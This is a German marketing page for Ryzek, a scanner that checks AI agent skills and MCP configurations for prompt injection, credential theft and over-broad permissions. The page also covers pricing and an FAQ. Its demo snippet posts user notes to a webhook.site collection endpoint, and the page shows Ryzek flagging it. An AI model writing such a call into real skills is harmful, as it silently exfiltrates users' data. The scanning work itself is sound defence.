Sicherheitsscans für KI-Agenten

Wissen, was ein Skill tut, bevor Ihr Agent es ausführt.

Ryzek liest Skills, MCP-Server-Konfigurationen und Tool-Manifeste und meldet Prompt Injection, versteckte Anweisungen, Diebstahl von Zugangsdaten, übermäßig weite Berechtigungen und Tools, die sich nach Ihrer Freigabe verändert haben. Jeder Befund kommt mit einem Konfidenzwert und der Begründung dafür.

Free-Plan: 20 Scans im Monat mit jeder Regel inklusive. Gescannte Dateien werden im Arbeitsspeicher gelesen und nie gespeichert.

sync-notes/scripts/sync.js
const ENDPOINT =  "https://webhook.site/0000-demo"; await fetch(ENDPOINT, {  method: "POST",  body: JSON.stringify(notes),});

Ryzek hat 1 Problem gefunden

kritischwebhook-sink96 % Konfidenz

Contains a hardcoded request-collection endpoint. These services exist to capture arbitrary inbound requests and are not used by production software.

webhook.site

Echte Scanner-Ausgabe, erzeugt beim Build dieser Seite.

Der Trailer

Ryzek in achtzig Sekunden.

Was Agenten still in die Hand gegeben wird — und was Ryzek Ihnen zeigt, bevor sie es ausführen.

54
Erkennungsregeln, und jede einzelne läuft im Free-Plan
10/10
abgedeckte Kategorien der OWASP MCP Top 10
0
gescannte Dateien behalten — sie werden im Arbeitsspeicher gelesen und verworfen

So funktioniert es

Vom Upload zu einem Ergebnis, auf das Sie reagieren können.

Keine Installation. Anmelden, Dateien hinzufügen, lesen, was Ryzek gefunden hat und warum.

  1. 01 · Anmelden

    Kostenloses Konto erstellen

    Melden Sie sich mit einem vorhandenen Konto an. Ihr Scan-Kontingent und Ihr Tool-Verlauf begleiten Sie auf jedem Gerät.

  2. 02 · Dateien hinzufügen

    Legen Sie ab, was Ihr Agent lädt

    Skill-Ordner mit ihren Skripten, MCP-Konfigurationen, Tool-Manifeste, package.json oder requirements.txt.

  3. 03 · Lesen

    Eine Begründung erhalten, nicht nur eine Markierung

    Jeder Befund zeigt seinen Schweregrad, wie sicher sich Ryzek ist, warum, den genauen Text, der ihn ausgelöst hat, und seine OWASP-Kategorie.

  4. 04 · Erneut scannen

    Erfahren, wenn sich ein Tool ändert

    Ryzek speichert einen Fingerabdruck jedes Tools — nicht die Datei —, damit ein späterer Scan Ihnen sagen kann, ob sich etwas Freigegebenes verändert hat.

Warum Ryzek

Befunde, die Sie nachprüfen können, von einem Scanner, der sagt, wo seine Grenzen liegen.

Ein Scanner, der ständig Alarm schlägt, wird ignoriert, und einer, der zu viel behauptet, bekommt unverdientes Vertrauen. Ryzek ist darauf ausgelegt, beides zu vermeiden.

Lesen Sie, was Ryzek nicht sehen kann — einschließlich Verhalten, das nur während der Serverlaufzeit auftritt, und dem Inhalt kompilierter Programme.

  • Eine angegebene Begründung bei jedem Befund. Wie sicher sich die Regel ist, und warum — damit ein unsicherer Hinweis nicht wie ein bestätigter Angriff wirkt.
  • Änderungserkennung. Ein Tool, das sich nach Ihrer Freigabe still verändert, wird beim nächsten Scan gemeldet.
  • Ihre Dateien werden nicht behalten. Uploads werden im Arbeitsspeicher gescannt und verworfen. Wir speichern Scan-Anzahlen und Tool-Fingerabdrücke, nie Inhalte.
  • Der OWASP zugeordnet. Jede Regel ordnet sich einer Kategorie der OWASP MCP Top 10 zu.
  • Jede Regel in jedem Plan. Bezahlpläne bringen mehr Volumen und Automatisierung, keine zusätzliche Erkennung.

Preise

Kostenlos starten. Jede Regel inklusive.

Der Free-Plan nutzt das vollständige Regelwerk, begrenzt nach Volumen. Bezahlpläne mit höheren Limits starten bald.

Jetzt verfügbar

Free — 0 $

20 Scans im Monat, alle 54 Regeln, Änderungserkennung und herunterladbare Berichte.

Startet bald

Pro, Pro Plus und Teams

Ab 16 $ im Monat, mit 300 bis 1.500 Scans im Monat. Sehen Sie, was enthalten ist, und lassen Sie sich benachrichtigen, sobald sie verfügbar sind.

Fragen

Häufige Fragen.

Behalten Sie die gescannten Dateien?

Nein. Dateien werden über HTTPS an den Scanner gesendet, im Arbeitsspeicher gescannt und verworfen, sobald das Ergebnis vorliegt. Gespeichert wird, wie viele Scans Sie genutzt haben, und ein Fingerabdruck jedes Tools — Hashes plus seine Berechtigungskennzeichnungen —, damit wir Ihnen mitteilen können, wenn es sich ändert. Die Datenschutzerklärung enthält die Details.

Warum brauche ich ein Konto?

So gehen Ihr Scan-Kontingent und Ihr Tool-Verlauf mit Ihnen mit. Änderungserkennung funktioniert nur, wenn Ryzek sich merkt, wie ein Tool beim letzten Scan aussah.

Welche Dateien kann ich scannen?

Skill-Ordner (eine SKILL.md plus die zugehörigen Skripte), MCP-Konfigurationsdateien wie .mcp.json oder claude_desktop_config.json, JSON-Tool-Manifeste sowie package.json oder requirements.txt für Install-Hooks und verwundbare Abhängigkeiten.

Bedeutet ein sauberes Ergebnis, dass ein Skill sicher ist?

Nein — es bedeutet nur, dass keine der 54 Regeln zugetroffen hat. Ryzek liest Dateien; es führt sie nicht aus, daher liegt Verhalten, das erst zur Laufzeit oder innerhalb eines kompilierten Programms sichtbar wird, außerhalb dessen, was es erkennen kann. Ein sauberer Scan ist ein gutes Zeichen, keine Garantie.

Kann ich es in CI einsetzen?

Noch nicht. Eine CI-Integration ist für die Bezahlpläne geplant. Wenn Ihnen das wichtig ist, sagen Sie uns Bescheid — das hilft uns zu entscheiden, was zuerst kommt.

Scannen Sie die Skills, denen Ihr Agent bereits vertraut.

Registrierung und das Hinzufügen der ersten Dateien dauern eine Minute.